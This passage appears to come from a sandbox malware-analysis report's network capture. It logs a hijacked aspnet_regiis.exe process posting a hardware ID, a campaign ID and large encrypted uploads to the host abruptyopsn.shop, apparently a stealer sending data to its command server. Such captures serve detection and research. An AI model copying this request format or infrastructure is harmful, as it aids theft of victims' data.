                                                                                        Data Ascii: --AHFIYDV7YKGV8GContent-Disposition: form-data; name="hwid"37D7E2640F944DA372671E44D842029A--AHFIYDV7YKGV8GContent-Disposition: form-data; name="pid"3--AHFIYDV7YKGV8GContent-Disposition: form-data; name="lid"LPnhqo--wcyjskajenao--A
                                                                                        2024-12-31 16:40:11 UTC4615OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3 5f de a8 de f8 f4 8d d8 f5 6f 86 49 00 00 00 00 00
                                                                                        Data Ascii: +?2+?2+?o?Mp5p_oI
                                                                                        2024-12-31 16:40:12 UTC1127INHTTP/1.1 200 OK
                                                                                        Date: Tue, 31 Dec 2024 16:40:12 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=lp1v5jsuov3s9clo6u401q4n5e; expires=Sat, 26 Apr 2025 10:26:51 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        X-Frame-Options: DENY
                                                                                        X-Content-Type-Options: nosniff
                                                                                        X-XSS-Protection: 1; mode=block
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7BTpj%2FL4AaSC%2BqvQO0LKRNLUS42cxduo%2FCFWDFQJ2HSIcBGiSz%2BNcoaLhWMIaeeb3NqgNgiKI6r8QLTP5U8VYMTR7xSnJo5OW21ye0EtbaPM6R4z29FfzWz7MfYZJ1arQP27"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8fabb5c2fb8172a4-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1895&min_rtt=1889&rtt_var=722&sent=11&recv=25&lost=0&retrans=0&sent_bytes=3052&recv_bytes=20904&delivery_rate=2253086&cwnd=213&unsent_bytes=0&cid=704409b2a1247e6f&ts=632&x=0"
                                                                                        2024-12-31 16:40:12 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                        Data Ascii: fok 8.46.123.189
                                                                                        2024-12-31 16:40:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        6192.168.2.649991104.21.96.14434512C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-31 16:40:13 UTC280OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: multipart/form-data; boundary=11I7CUU94REU7W6
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 643165
                                                                                        Host: abruptyopsn.shop
                                                                                        2024-12-31 16:40:13 UTC15331OUTData Raw: 2d 2d 31 31 49 37 43 55 55 39 34 52 45 55 37 57 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 37 44 37 45 32 36 34 30 46 39 34 34 44 41 33 37 32 36 37 31 45 34 34 44 38 34 32 30 32 39 41 0d 0a 2d 2d 31 31 49 37 43 55 55 39 34 52 45 55 37 57 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 31 31 49 37 43 55 55 39 34 52 45 55 37 57 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 77 63 79 6a 73 6b 61 6a 65 6e 61 6f 0d 0a
                                                                                        Data Ascii: --11I7CUU94REU7W6Content-Disposition: form-data; name="hwid"37D7E2640F944DA372671E44D842029A--11I7CUU94REU7W6Content-Disposition: form-data; name="pid"1--11I7CUU94REU7W6Content-Disposition: form-data; name="lid"LPnhqo--wcyjskajenao
                                                                                        2024-12-31 16:40:13 UTC15331OUTData Raw: 10 f4 0e 87 5c 9f 44 c1 5b 91 3e 09 f6 8d 85 f9 a4 35 e2 19 33 cd 3e 55 cf b1 92 ce 19 ee 0e 20 64 9a 16 0d ee 95 65 a5 f2 97 7d d3 ae 15 d9 72 06 e9 a9 e6 55 06 47 e5 d8 a9 ac 85 85 f4 1f 27 ef 85 10 12 2e 23 48 f7 25 e9 60 1f 87 f6 ce 05 f1 ca da d1 f5 6b 88 4e f3 59 6d c1 08 30 ce 12 6e 73 ae c5 de 79 87 d4 9a 94 18 19 31 ff 0d 9b fc cd f0 5b 49 d1 af eb 1f 30 ba 66 9b 49 f3 5f b2 fa 81 06 e6 4b 67 a0 26 fe b0 69 52 71 af 4d ef 7f 90 64 01 b8 6b cf 3b a4 3a 1c 40 02 94 c6 d3 e6 c7 55 1f 2d b7 9a 72 23 83 12 3f 6a f0 b3 02 3c d2 af fe 27 ba 0f 8a 4b 7f 00 33 cc d0 22 1c fe cd 69 93 d6 32 6f 18 05 7d 15 84 2d 3f a3 90 6a f4 b3 a3 39 da ec d2 85 59 d3 e0 78 f1 ee 85 e5 b1 42 b5 7b 20 cc 20 ba dd 62 a6 91 b1 61 c4 81 be 18 37 c0 be 4e 7b 96 24 ad dc d4 ad
                                                                                        Data Ascii: \D[>53>U de}rUG'.#H%`kNYm0nsy1[I0fI_Kg&iRqMdk;:@U-r#?j<'K3"i2o}-?j9YxB{ ba7N{$
                                                                                        2024-12-31 16:40:13 UTC15331OUTData Raw: 22 1b 27 6a e7 12 f1 f6 a2 86 da 5a 65 78 96 52 b8 fd c7 38 80 ec ff 2a cf f1 8e d3 db 51 1d 04 7f 1c fd af 01 f5 c8 98 3f 03 9c 47 47 cd 6b af fa c5 fb 32 71 a0 3a 5b 33 1f 59 5f a7 6c bb 46 44 ba 00 55 6c d7 9a 0b 7c ba 65 0c 46 69 64 d9 2b 3d e9 7d 13 04 e8 6b e2 35 9e 09 45 84 97 0e 8c c8 37 e1 83 18 71 74 f0 41 a7 a4 62 9f 06 49 5e 1b ed 41 4c 0b 32 ab 28 ff b1 bd c4 b2 98 79 b7 b0 7e 47 f8 55 36 cf 93 4a 4c 19 a7 82 0c 18 f6 6d 90 e3 c6 36 2b 4d da 1f e2 0f fd 72 2e 32 6a 4b 21 eb 51 c9 cf 58 17 b2 4b 6e 9f 6c 20 56 ff c3 7d f5 be c8 ca f9 2f 2b 64 d1 17 91 e0 83 b2 7a 93 78 9d c4 24 d9 66 51 6a 63 21 70 62 34 03 36 38 bd e3 57 03 94 7f fe 31 ba 1a f2 4f ef f4 87 1f f9 40 14 3d f9 9f 27 d4 56 4d 34 6c f4 99 bc 0f 5d cb 15 ce 05 4c d0 79 b0 e7 9e e7
                                                                                        Data Ascii: "'jZexR8*Q?GGk2q:[3Y_lFDUl|eFid+=}k5E7qtAbI^AL2(y~GU6JLm6+Mr.2jK!QXKnl V}/+dzx$fQjc!pb468W1O@='VM4l]Ly
                                                                                        2024-12-31 16:40:13 UTC15331OUTData Raw: ea 61 b9 a1 18 6f fc 7b f1 1f 1d bf 90 a5 89 9b 28 94 a0 ca 43 dd d7 2c 10 0c 39 69 4c a9 6a 1f cc 28 fd 98 dd 2d 3b b1 5f 9c 84 df c6 04 6c 0b dd 4a c6 68 8e 61 b7 0a 72 66 71 64 4d 12 ab c7 94 fd 84 df 86 b4 3b 86 42 f8 49 62 80 2e 3a b1 d8 25 df 56 f5 2e 82 14 f0 79 49 04 c0 72 9f 33 4e ed a2 2a 21 76 56 04 f2 2f 13 f5 75 a5 9c fb 21 09 df 19 a1 20 83 17 ff 81 6a e4 e7 e3 20 99 28 50 53 13 2d 33 70 f0 b4 25 8c 12 5e f5 3e ca 56 72 84 f0 5f ab eb 42 2e 1a 5c 0c 35 87 38 fb fc bd 7d 72 40 72 11 5a 5c bc ae 4f c1 12 3b f3 5b c9 2c 85 f2 c0 16 c1 8e fe c9 a4 bf fe d7 21 df 51 75 5b b2 24 b9 ed 1e 94 ec e6 e3 e2 0a bf fb b1 93 2c 74 36 96 ec 9d ab 97 f8 a7 7c 6d d1 94 06 c4 84 f0 c6 fc 09 88 bb 2a 7d 8d d1 fe 39 56 12 4f ea 9c 4c 49 6c 3e f7 da 22 72 43 f6
                                                                                        Data Ascii: ao{(C,9iLj(-;_lJharfqdM;BIb.:%V.yIr3N*!vV/u! j (PS-3p%^>Vr_B.\58}r@rZ\O;[,!Qu[$,t6|m*}9VOLIl>"rC
                                                                                        2024-12-31 16:40:13 UTC15331OUTData Raw: 9e 7d ab 8e 28 10 6c 95 82 e9 6d 2b 4c c1 21 f9 4a 16 f6 85 67 43 44 b3 8f d8 f0 1d 71 c2 f3 cc 80 15 89 1e a5 bf 70 d2 c4 8c e6 e0 a7 b9 8a f5 33 d8 49 7b 71 20 10 c3 ac 95 03 f1 ed 04 6e df 68 8c 5d 6c e4 7f 1d 1a 83 cb 5b c3 67 95 68 d8 d6 e1 da 31 3b 4a 4a 78 03 27 9a 1f f6 8d b6 6f a1 8f 0e 92 fd e7 0b 5f 58 8c 90 4d 7b c0 e1 61 ac 14 94 1d 11 1f e8 ec 70 f5 f5 be dd 74 1f 4c 24 6e f4 75 8b fc 8e b2 68 23 a9 4f 27 e4 12 3a 4a 28 ac fe 4a 6a 78 16 75 86 c3 84 bb 79 46 2d 7d fe 87 1f 91 17 fd 51 ef b7 49 09 a9 66 a5 df e4 54 78 82 8d 11 91 b1 2d 04 1a b8 f5 b7 58 07 56 9e 97 be 44 10 78 7f 5b 6a 52 dc fb b6 3f a3 f5 fc d9 3e da 80 86 d1 3a f5 b5 56 57 80 30 f2 8c d6 35 bf 2c a1 66 cd b2 43 05 8a 65 95 28 4c b8 a4 02 b2 da 3c 49 d7 b8 2e f3 74 2d d8 27
                                                                                        Data Ascii: }(lm+L!JgCDqp3I{q nh]l[gh1;JJx'o_XM{aptL$nuh#O':J(JjxuyF-}QIfTx-XVDx[jR?>:VW05,fCe(L<I.t-'
                                                                                        2024-12-31 16:40:13 UTC15331OUTData Raw: 37 50 a6 09 53 93 9a 1a 9b ed ec eb 58 79 a9 75 c6 71 8d 95 45 72 99 fe 13 38 34 55 33 33 66 aa bf 42 a6 43 c7 a3 db 78 f1 44 82 1e c6 20 f9 f3 a3 3b 5f e6 1e 31 e8 12 5b 7a cd 1b 24 7f 1f 5b 05 2e 38 ac 9e 13 e1 71 db b1 1d ad bd de cb 07 6b c2 b9 99 f2 d6 c0 fe 9f c4 23 dd 9b ee 94 c1 b7 c6 d4 05 2c 14 26 02 be 36 0c 13 67 fc 9d 56 14 4a 69 94 1e ed 16 d4 5d 11 3d dd f1 a6 69 2c aa 0d a8 04 d8 83 2a 1a 41 6c 14 48 62 b2 33 6c e3 2e 24 fc ac 4b cf 88 0c b7 8b 4c ed fd a2 57 64 c7 e0 e7 f0 b8 2d e6 67 ea 73 0b 71 0d ec cb 04 ba 15 1a 97 3c bd bd f7 d2 8b 50 7b e4 48 f6 ea 5a cf af 45 b7 e2 e4 fe bd a0 29 50 f6 8a 18 48 e2 f6 56 69 28 c0 69 c8 ab 2a de 06 88 fa bc 12 43 d5 0e 65 a9 c1 4c 2c 5c 04 65 c8 86 13 bd 3a 85 65 7e df c8 49 ef 78 4a f2 3a 20 2b 6b
                                                                                        Data Ascii: 7PSXyuqEr84U33fBCxD ;_1[z$[.8qk#,&6gVJi]=i,*AlHb3l.$KLWd-gsq<P{HZE)PHVi(i*CeL,\e:e~IxJ: +k
                                                                                        2024-12-31 16:40:13 UTC15331OUTData Raw: bf 92 b0 b4 d1 63 f2 8a fc fc 66 e6 50 7b 48 85 ff e9 5c 7a 47 05 47 e1 8e de 3b c5 a9 d8 75 d9 6f 75 37 bc 3d 1d 51 19 97 95 e4 b8 a9 9d 56 4f a4 bd 61 fa 77 12 30 11 f1 c9 8f 91 7c b2 59 30 45 58 94 10 03 17 be 06 ec bb c1 6f c0 21 d7 18 0f 7c 5c 4c 25 0c a8 5c 1c 45 7d 8a dc 97 69 cd 29 ae e5 51 13 ab df 7e c6 66 c2 78 ad 2f 32 bb e4 4c cf 97 68 99 a9 10 19 58 81 71 06 38 d6 ed 3f 3a 8a 5f 7a 98 9c dd 12 4c 6f a8 f7 78 9f 80 7f 86 e5 c1 df dd 74 bb 4f 37 a9 2e 22 ea 22 40 db 4f 4b 46 66 8c 34 74 36 11 6e 91 98 fd 7f d4 27 3e a8 15 0a b0 06 09 c7 f1 2b 2d 75 c2 04 e4 37 fe 7a 32 80 57 5e 35 3a 2c a8 23 9b 45 49 81 8f 9b d7 21 ab 2c 21 57 35 ea 0e 6c 34 92 8e 85 22 13 d0 da 95 06 4f 76 44 fb b6 55 e6 6c 69 49 dd d7 8b 89 70 92 83 c1 2c 8b f1 ca ac 13 ae
                                                                                        Data Ascii: cfP{H\zGG;uou7=QVOaw0|Y0EXo!|\L%\E}i)Q~fx/2LhXq8?:_zLoxtO7.""@OKFf4t6n'>+-u7z2W^5:,#EI!,!W5l4"OvDUliIp,
                                                                                        2024-12-31 16:40:13 UTC15331OUTData Raw: d5 5b ef bf 1c 13 ea f0 3b c4 bd 0c b9 1e 82 d4 dd 0a c1 12 65 71 53 b1 d9 45 2e 26 a3 37 69 2e be d7 46 5d 24 f4 bf c9 44 9e ae 6f 7b 7c 27 94 1b 94 b4 bc 8e bd af 03 91 cd 1b 4b 12 26 12 50 5e a5 89 8c 4a 7d 83 a5 d0 cb 4f 6d ef 6a 1b 40 b1 72 4a 6b 83 9f 35 66 b5 b5 d8 0b c5 41 02 ec 52 26 30 5e 42 1c 59 48 d8 ed 58 94 ad 84 c1 07 f7 fb 46 c5 b8 cb 49 b4 0d 3c ed 64 34 52 eb c2 32 d4 73 51 7c 8b 65 10 4c 32 39 6a 19 95 fd f2 6d 99 3c 64 a5 e9 d7 d4 69 c4 a2 f0 e3 4f 9b a8 cf 55 d9 bb 64 64 32 cb b4 1d 22 6d db 8c 5b 89 ab 03 30 6a ed 35 23 66 81 43 9e d7 51 be 8d 6f ee 3b 05 c2 a9 f5 07 99 c0 59 c2 23 4c e3 9f a6 22 e0 ce e5 c0 17 b1 5e 25 cb 54 9d 01 b8 7d 73 43 a4 a3 44 81 ac d4 56 68 6c eb 0a 0e fb 3d 11 67 0a d9 0b 18 42 c4 cd 1d 4a 6f 74 74 ca 6f
                                                                                        Data Ascii: [;eqSE.&7i.F]$Do{|'K&P^J}Omj@rJk5fAR&0^BYHXFI<d4R2sQ|eL29jm<diOUdd2"m[0j5#fCQo;Y#L"^%T}sCDVhl=gBJotto
                                                                                        2024-12-31 16:40:13 UTC15331OUTData Raw: a3 c0 64 dc fc ee e8 96 1f 90 be b5 c3 22 94 39 42 9b 3e 9a 46 16 08 44 f2 b3 84 db 5a 7e 9f 6f 76 0c 21 9a 4f b4 78 e7 f5 56 7f de 7c 63 9d 07 9d 54 5f b1 05 9e 46 b1 9a 3b ba d4 62 e5 49 34 55 98 38 df 8e 80 a5 13 e9 e2 52 c4 b5 7a 08 b3 cb e7 d2 d2 30 69 84 ba 9b 78 18 22 2c d6 73 6d 00 76 fd d2 39 8c 14 ed 87 db 13 2d 0e 3d 71 85 6e 27 33 eb f7 f1 da 29 6c e0 56 3b 14 bf c5 a8 26 fb d4 1d 78 d8 79 81 92 4f ce cb 47 d2 84 29 bd 46 4f 0a da cc 18 3e 6d 25 f4 69 dd ae 2f 6f 8a ce 91 09 c3 eb 88 e3 71 40 8f 5c ff 17 2d 03 18 c7 ef f5 81 42 b7 51 1d b8 ca b4 e5 5f 59 31 d0 47 49 5f 01 a0 15 07 64 2a 42 ce 31 5f 18 50 4e 1e c3 87 a3 62 f4 ab 1e 6d a8 a2 af 8f e3 79 7c a7 0d 82 b4 b0 05 2a 1b 18 03 55 89 b7 e1 ff e1 a4 a3 36 0b 0a 6b 37 ef 93 46 27 97 cc 35
                                                                                        Data Ascii: d"9B>FDZ~ov!OxV|cT_F;bI4U8Rz0ix",smv9-=qn'3)lV;&xyOG)FO>m%i/oq@\-BQ_Y1GI_d*B1_PNbmy|*U6k7F'5
                                                                                        2024-12-31 16:40:13 UTC15331OUTData Raw: b3 ae 42 30 bb a5 db ac f6 dc ef 7a 92 a9 6f f4 17 ae 36 58 09 be 4f 90 21 66 11 3c fe 4f a3 7d cc ab f7 e7 c1 dd bc 81 cc f4 4e 89 16 99 7e 34 4c fb b0 39 6a eb 1b d0 25 7c be b6 6c d3 7b 35 bd 6c 98 c7 f6 18 f1 a3 b4 99 ca 0a a6 f3 01 cf 53 28 f0 00 3f fd 1a bf 66 5c d5 9b 46 66 bf 26 45 20 99 d3 fd d8 05 29 7c 3b 10 b4 52 16 47 b7 24 b0 0a e1 e6 b6 b4 03 e5 ce d2 5d e7 b8 7f 49 f1 69 31 2c 0e d6 f1 ca 1d d0 5b cd 9e ce e5 1c 0d e5 c9 e0 73 ff ba 17 a8 59 6e 00 d1 24 23 47 77 5b 31 3b 68 fd 3d d8 f4 f9 ea 43 8d af 65 a8 da 6e e3 a0 49 e0 44 e8 20 cf 54 05 59 f0 ea 76 14 58 b5 ab 36 f8 09 70 18 c4 f7 0c a6 78 d8 c7 32 dd 96 29 ac c0 2c 4b 7f 14 7f d7 f8 75 b7 1b 16 81 8b 82 2f fa b4 08 b9 fd c2 89 4c e4 bb d9 40 25 d2 f9 fb 97 a5 4e 83 57 30 ee d8 e2 cf
                                                                                        Data Ascii: B0zo6XO!f<O}N~4L9j%|l{5lS(?f\Ff&E )|;RG$]Ii1,[sYn$#Gw[1;h=CenID TYvX6px2),Ku/L@%NW0
                                                                                        2024-12-31 16:40:16 UTC1127INHTTP/1.1 200 OK
                                                                                        Date: Tue, 31 Dec 2024 16:40:16 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=miqojph2mi75aj14fk6h0qff1k; expires=Sat, 26 Apr 2025 10:26:54 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        X-Frame-Options: DENY
                                                                                        X-Content-Type-Options: nosniff
                                                                                        X-XSS-Protection: 1; mode=block
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IC5KBvSmK5YCrEuI9%2F2fUtNU6xXbKyVtrE10GCXAfRz5yKC6JD4ygCOuhXlxe5UOoTbIvGqEl0ZR2utZ2vPrMa31d0Q0eHrK1gok0GNZfWkTS0xvu%2BEeg3pkLG4kQk6qPQhx"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8fabb5ccdce942c0-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1768&min_rtt=1765&rtt_var=669&sent=218&recv=646&lost=0&retrans=0&sent_bytes=3052&recv_bytes=645907&delivery_rate=2440111&cwnd=213&unsent_bytes=0&cid=65339b85ebeca0d7&ts=2576&x=0"


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        7192.168.2.649992104.21.96.14434512C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-31 16:40:16 UTC281OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: multipart/form-data; boundary=YJXWJ58MFD0S9MHS2Y
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 1221
                                                                                        Host: abruptyopsn.shop
                                                                                        2024-12-31 16:40:16 UTC1221OUTData Raw: 2d 2d 59 4a 58 57 4a 35 38 4d 46 44 30 53 39 4d 48 53 32 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 37 44 37 45 32 36 34 30 46 39 34 34 44 41 33 37 32 36 37 31 45 34 34 44 38 34 32 30 32 39 41 0d 0a 2d 2d 59 4a 58 57 4a 35 38 4d 46 44 30 53 39 4d 48 53 32 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 59 4a 58 57 4a 35 38 4d 46 44 30 53 39 4d 48 53 32 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 77 63 79 6a 73
                                                                                        Data Ascii: --YJXWJ58MFD0S9MHS2YContent-Disposition: form-data; name="hwid"37D7E2640F944DA372671E44D842029A--YJXWJ58MFD0S9MHS2YContent-Disposition: form-data; name="pid"1--YJXWJ58MFD0S9MHS2YContent-Disposition: form-data; name="lid"LPnhqo--wcyjs
                                                                                        2024-12-31 16:40:17 UTC1118INHTTP/1.1 200 OK
                                                                                        Date: Tue, 31 Dec 2024 16:40:17 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=r9cjtbp4j8p6rv4qf5bptg2igf; expires=Sat, 26 Apr 2025 10:26:55 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        X-Frame-Options: DENY
                                                                                        X-Content-Type-Options: nosniff
                                                                                        X-XSS-Protection: 1; mode=block
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JRxTVoElXSb2wFbhsfTYyGAjwzPK8pRbtSPdxBJVbMfVqVnqK7AEKNOzcvy0qyoFmPjeCJNp2aBSKXOU0rjs7xcKL5Xj395zCVMC4QZ1P5rAevuv2jNd1EINS0%2FvFxqQqUVK"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8fabb5e09919c32e-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1727&min_rtt=1717&rtt_var=664&sent=5&recv=7&lost=0&retrans=0&sent_bytes=3052&recv_bytes=2138&delivery_rate=2437395&cwnd=179&unsent_bytes=0&cid=8ea2aa01ab2ff053&ts=469&x=0"
                                                                                        2024-12-31 16:40:17 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                        Data Ascii: fok 8.46.123.189
                                                                                        2024-12-31 16:40:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        8192.168.2.649993104.21.96.14434512C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-31 16:40:18 UTC282OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: multipart/form-data; boundary=TO4PJTFMAFGJ6OA7Y
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 570636
                                                                                        Host: abruptyopsn.shop
                                                                                        2024-12-31 16:40:18 UTC15331OUTData Raw: 2d 2d 54 4f 34 50 4a 54 46 4d 41 46 47 4a 36 4f 41 37 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 37 44 37 45 32 36 34 30 46 39 34 34 44 41 33 37 32 36 37 31 45 34 34 44 38 34 32 30 32 39 41 0d 0a 2d 2d 54 4f 34 50 4a 54 46 4d 41 46 47 4a 36 4f 41 37 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 54 4f 34 50 4a 54 46 4d 41 46 47 4a 36 4f 41 37 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 77 63 79 6a 73 6b 61 6a
                                                                                        Data Ascii: --TO4PJTFMAFGJ6OA7YContent-Disposition: form-data; name="hwid"37D7E2640F944DA372671E44D842029A--TO4PJTFMAFGJ6OA7YContent-Disposition: form-data; name="pid"1--TO4PJTFMAFGJ6OA7YContent-Disposition: form-data; name="lid"LPnhqo--wcyjskaj
                                                                                        2024-12-31 16:40:18 UTC15331OUTData Raw: 19 9e fa 2b 35 e8 3d 98 9a 7d fb 60 aa 14 50 19 83 72 5a 60 57 1b 77 e6 8c 02 c8 74 21 82 06 fa eb 11 fe 73 b8 41 76 68 4b 65 b9 6c 76 42 b7 6b a3 f7 33 c3 05 8e 9a ea 08 cb 73 e3 a5 01 ce 9b a5 ff dd 57 f0 ff 7d c9 00 f4 8a 6e 30 8b 03 89 16 d4 62 2e 60 d7 fe 5a ce 64 da 64 8e c6 fa a6 b0 4b 28 7e db 50 bc 9d 94 90 83 71 f0 56 9c b9 73 cf af a6 27 37 20 02 2e a6 65 3b 7b e2 40 9b 32 ef 0f 0b 74 fc b6 3c e7 6a 48 49 03 a6 6e 13 54 ea d0 02 36 df 66 46 26 bd 33 67 8b f5 c9 d1 5d 78 50 dc 68 44 ca 93 c5 29 0d fe 77 dd 64 6a 9d 95 a2 f6 30 ac c0 aa 04 76 1e fc 1f 95 55 98 f2 b3 98 39 0a 12 13 04 b9 2b 73 9b 5d c4 79 a4 15 e5 06 ee 62 8e 6f a8 a6 30 99 44 43 bc 8e f0 86 dc ca a7 10 d8 78 5b e9 83 48 53 2c ec ff 13 5a db 8a 53 35 bb 63 1d 56 a9 ec 00 91 27 9a
                                                                                        Data Ascii: +5=}`PrZ`Wwt!sAvhKelvBk3sW}n0b.`ZddK(~PqVs'7 .e;{@2t<jHInT6fF&3g]xPhD)wdj0vU9+s]ybo0DCx[HS,ZS5cV'
